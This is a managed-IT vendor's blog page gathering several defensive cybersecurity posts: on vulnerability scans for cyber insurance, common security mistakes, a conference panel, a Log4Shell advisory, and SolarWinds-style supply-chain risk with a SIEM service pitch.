Category: cybersecurity

Vulnerability Assessment for Cyber Insurance

[2 min. read]

Cybersecurity and Ostrich-itis

When it comes to knowing what your company’s security vulnerability status is, if you’re not looking,
everything probably looks perfect. It might sound obvious, but after reading Checkpoint’s yearly security
report for 2022, it looks like vulnerabilities aren’t being remediated which could mean, companies aren’t
even aware of their own organizational risk.

The following graph shows that 83 percent of attacks in 2021 used vulnerabilities that were at least two
years old with 42 percent being over 7 years old.

Why Cyber Insurance Needs Vulnerability Assessments

Either these vulnerabilities are being ignored, the risk accepted, or companies aren’t scanning for vulnerabilities that would pinpoint these for remediation. Perhaps the belief that it will never happen to us because we are too small of a target and don’t have anything of value. The problem with this thought process is that you are putting your entire company at risk. Should a breach of confidential data occur, or loss of system resources cause you to have your computer systems go offline this may put your organization unable to access technical resources.

In the past, this risk has been reduced through the ability to transfer this risk to Insurance companies. It seems that this is now changing as Insurance companies are requiring best practices to be implemented before Cyber Insurance policies are finalized. This may include a requirement for a vulnerability assessment to be completed that detail the vulnerabilities within your organization. This will allow you to be aware of risks to the organization.

Vulnerability Assessments & Management from Morefield

At Morefield, we provide vulnerability scans to organizations which include an initial vulnerability scan, providing various reports to allow remediation by the company, and a follow-up scan that shows remaining vulnerabilities left after remediation. We recommend that security patches are applied to systems and software to minimize exposed vulnerabilities and to minimize the possibility that defenses are penetrated. We support cybersecurity framework guidelines that recommend remediation for critical vulnerabilities within 30 days and high vulnerabilities within 60 days.

If you find yourself requiring a vulnerability scan to obtain cyber insurance, we can assist you in providing the information you need and work with you to prioritize remediation to fulfill the requirements for cyber insurance.

We also offer a vulnerability management solution to allow monthly scans to be completed and we work with the organization to discover, prioritize, assess, assist with remediation, verify, and report vulnerabilities.

Contact our team of experts today!

 

written by: Allan Jacks, vCISO (Virtual Chief Information Security Officer)

Top 5 Cybersecurity Mistakes That Leave Your Data at Risk

The global damage of cybercrime has risen to an average of $11 million USD per minute, which is a cost of $190,000 each second.
60% of small and mid-sized companies that have a data breach end up closing their doors within six months because they can’t afford the costs. The costs of falling victim to a cyberattack can include loss of business, downtime/productivity losses, reparation costs for customers that have had data stolen, and more.

You may think that this means investing more in cybersecurity, and it is true that you need to have appropriate IT security safeguards in place (anti-malware, firewall, etc.). However, many of the most damaging breaches are due to common cybersecurity mistakes that companies and their employees make.

The 2021 Sophos Threat Report, which looked at thousands of global data breaches, found that what it termed “everyday threats” were some of the most dangerous. The report stated, “A lack of attention to one or more aspects of basic security hygiene has been found to be at the root cause of many of the most damaging attacks we’ve investigated.”

Is your company making a dangerous cybersecurity mistake that is leaving you at high risk for a data breach, cloud account takeover, or ransomware infection? Here are several of the most common missteps when it comes to basic IT security best practices.

NOT IMPLEMENTING MUTI-FACTOR AUTHENTICATION (MFA)

Credential theft has become the top cause of data breaches around the world, according to IBM Security. With most company processes and data now being cloud-based, login credentials hold the key to multiple types of attacks on company networks.
Not protecting your user logins with multi-factor authentication is a common mistake and one that leaves companies at a much higher risk of falling victim to a breach.

MFA reduces fraudulent sign-in attempts by a staggering 99.9%.

IGNORING THE USE OF SHADOW IT

Shadow IT is the use of cloud applications by employees for business data that haven’t been approved and may not even be known about by a company.

Shadow IT use leaves companies at risk for several reasons:

• Data may be used in a non-secure application
• Data isn’t included in company backup strategies
• If the employee leaves, the data could be lost
• The app being used might not meet company compliance requirements

Employees often begin using apps on their own because they’re trying to fill a gap in their workflow and are unaware of the risks involved with using an app that hasn’t been vetted by their company’s IT team.

It’s important to have cloud use policies in place that spell out for employees the applications that can and cannot be used for work.

THINKING YOU’RE FINE WITH ONLY AN ANTIVIRUS APPLICATION

No matter how small your business is, a simple antivirus application is not enough to keep you protected. In fact, many of today’s threats don’t use a malicious file at all.

Phishing emails will contain commands sent to legitimate PC systems that aren’t flagged as a virus or malware. Phishing also overwhelmingly uses links these days rather than file attachments to send users to malicious sites. Those links won’t get caught by simple antivirus solutions.

You need to have a multi-layered strategy in place that includes things like:

• Next-gen anti-malware (uses AI and machine learning)
• Next-gen firewall
• Email filtering
• DNS filtering
• Automated application and cloud security policies
• Cloud access monitoring

NOT HAVING DEVICE MANAGEMENT IN PLACE

A majority of companies around the world have had employees working remotely from home since the pandemic, and they’re planning to keep it that way. However, device management for those remote employee devices as well as smartphones used for business hasn’t always been put in place.
If you’re not managing security or data access for all the endpoints (company and employee-owned) in your business, you’re at a higher risk of a data breach.
If you don’t have one already, it’s time to put a device management application in place, like Intune in Microsoft 365.

NOT PROVIDING ADEQUATE TRAINING TO EMPLOYEES

An astonishing 95% of cybersecurity breaches are caused by human error. Too many companies don’t take the time to continually train their employees, and thus users haven’t developed the skills needed for a culture of good cybersecurity.
Employee IT security awareness training should be done throughout the year, not just annually or during an onboarding process. The more you keep IT security front and center, the better equipped your team will be to identify phishing attacks and follow proper data handling procedures.

Some ways to infuse cybersecurity training into your company culture include:

• Short training videos
• IT security posters
• Webinars
• Team training sessions
• Cybersecurity tips in company newsletters

 

WHEN DID YOU LAST HAVE A CYBERSECURITY CHECKUP?

Don’t stay in the dark about your IT security vulnerabilities. Schedule a cybersecurity audit with Morefield to uncover vulnerabilities so they can be fortified to reduce your risk.

 

 

Article used with permission from The Technology Press.

Cybersecurity Speakers at PICPA 2022 Conference

Join Morefield at the Pennsylvania Institute Of Certified Public Accountants 2022 Conference

We are honored to have our Cybersecurity experts, Clinton Eppleman and Alex Thomas, participate in this year’s conference discussing cybersecurity in the financial industry. They will joining the panel with fellow industry experts from Schneider Downs and Feeding Pennsylvania to discuss the most cutting-edge tools, tips, and tricks related to digital security, preventative and risk-mitigating cyberpractices & policy implementation for protecting your business.

Learn more at – https://www.picpa.org/attend-cpe-events/conferences/picpa-cfos-and-controllers-conference 

Day 2: Thursday, March 31, 2022

8:00 a.m.

Cybersecurity

  • Pursue the most cutting-edge tools, tips, and tricks related to digital security
  • Preventative and risk-mitigating cyberpractices
  • Policy implementation for protecting your business

Clinton Eppleman
Team Lead, IT Professional Services
Morefield Communications

Alexander Thomas
Team Lead
Morefield Communications
David B. Murphy
Lead Cybersecurity Analyst
Schneider Downs
Moderator: Shea S. Saman, CPA
Chief Financial Officer
Feeding Pennsylvania

Morefield Communications Security Advisory: Log4Shell CVE-2021-44228

Morefield Communications Cybersecurity and IT Operations team have been carefully monitoring a new vulnerability in the Log4J Java library which provides logging capabilities to various software. This new vulnerability (Log4Shell) allows a remote, unauthenticated attacker to force Java-based applications and servers to log a specific string into their internal systems, if using the Log4J library. When the application or server processes the logs, the string can force the vulnerable system to download and run a malicious script from an attacker-controlled domain, effectively taking over the vulnerable application or server.

A significant number of applications are affected. We will be updating this post as new information and affected applications are discovered.

Listed below are some of the running list of all applications and/or server products affected:

  • Apache Software Foundation – Apache Struts, Apache Flink, Apache Druid, Apache Flume, Apache Solr, Apache Flink, Apache Kafka, Apache Dubbo (not limited to these products)
  • VMWare
  • ElasticSearch
  • Apple
  • Twitter
  • Amazon
  • Minecraft
  • Palo Alto
  • IBM
  • CloudFlare
  • JD
  • NetEase
  • Tencent
  • Todo
  • Baidu
  • Didi
  • Steam
  • Tenable
  • Tesla

BlueTeam CheatSheet * Log4Shell* – User community updated list of vulnerable applications

Additional Resources:

 

We expect more application vendors to report this vulnerability and we are diligently monitoring vendor responses for platforms and systems commonly deployed. We are committed to helping our clients make smart technology decisions while delivering outstanding service and expert solutions. If you have any questions, please contact your Network Administrator or Sales Representative.

Could SolarWinds Happen to Me?

TRUST.

Trust. You always have to trust someone in a digital world. The news headlines below describe a current reality: the largest cybersecurity attack in history is being unraveled in real time. To be fair, the attack was publicly disclosed a month ago in December, and experts are still trying to figure out the scope of compromise. Organizations of all sizes, utilizing the SolarWinds Orion platform, potentially installed a malicious update to this software platform. Ironically, the Orion platform is used to increase availability of resources – one of the three key pillars of cybersecurity.

Most of our clients do not have the budget or talent to develop their digital software in house, so they purchase software developed by a third party. Think about all of the different types of software you interact with on a daily basis: CRM, word processor, spreadsheet, email, etc. In each instance, some level of trust is required before you start to utilize these software packages. We likely don’t think twice about the software development process – we just care that it has the features and workflow that will move our organization forward. Perhaps we assume that these vendors make cybersecurity a priority during software development. Should we make this assumption?

Many small to mid-size organizations are not going to be able to influence the security considerations that go into an off the shelf software package. Your investment in the vendors product is a drop in the revenue bucket – take it or leave it.

In all fairness, many of the organizations that were targeted during the SolarWinds Orion compromise are very large organizations. They have a dedicated cybersecurity budget. Many take cybersecurity seriously and implement controls that make sense in their environment, and yet for months attackers went undetected in their network. The point here is that you can do all the “right” things, make the “right” technical control investments, and yet not achieve the outcome you expect.

A Security Event & Incident Management (SEIM) platform is designed to digest logging data and then analyze it in a variety of ways. Such a platform can consume logging from any number of sources: firewalls, security tools, workstations, servers, etc. These data streams are then compared against various threat intelligence feeds to alert you of events that show some degree of an indicator of compromise. This real time data can alert system administrators to potential security events that would otherwise go unnoticed. You can also conduct threat hunting exercises to review historical data in the event you learn about some form of zero-day (or novel) threat that has already happened, such as what happened with the SolarWinds incident – an attack that went undetected around the world for over six months.

Written by Clinton Eppleman, CISSP, Team Lead, IT Professional Services, Morefield Communications

Boost Your CyberSecurity With Morefield Communications

We have partnered with Perch Security to deliver a managed SEIM service in partnership with their Security Operations Center (SOC) – a team of hyper focused cybersecurity professionals that monitor the logging from you network 24/7. The Perch solution helps to monitor your network at all times, and they will escalate any actionable events to your attention for remediation. This cloud hosted solution will scale from just a few endpoints to thousands of devices.

Perch also helps organizations satisfy compliance requirements, for example: CCMC, HIPPA, SOX, PCI, etc. Many small organizations also use cybersecurity frameworks, such as the NIST Cyber Security Framework (CSF), to drive decision making and to facilitate creation of an organizational security policy. The Perch solution fits into the following CSF functions: Identification, Protection, Detection, and Response.

The outcome for a small business is clear when choosing security solutions: you can spend less of your time trying to find a needle in a haystack and more time focused on your business goals. We encourage you to reach out if you would like to learn more about the Perch Solution.

Contact Morefield Communications to learn what those network defenses are for you.

Learn more about IT security from an expert

Sign Up for Our Newsletter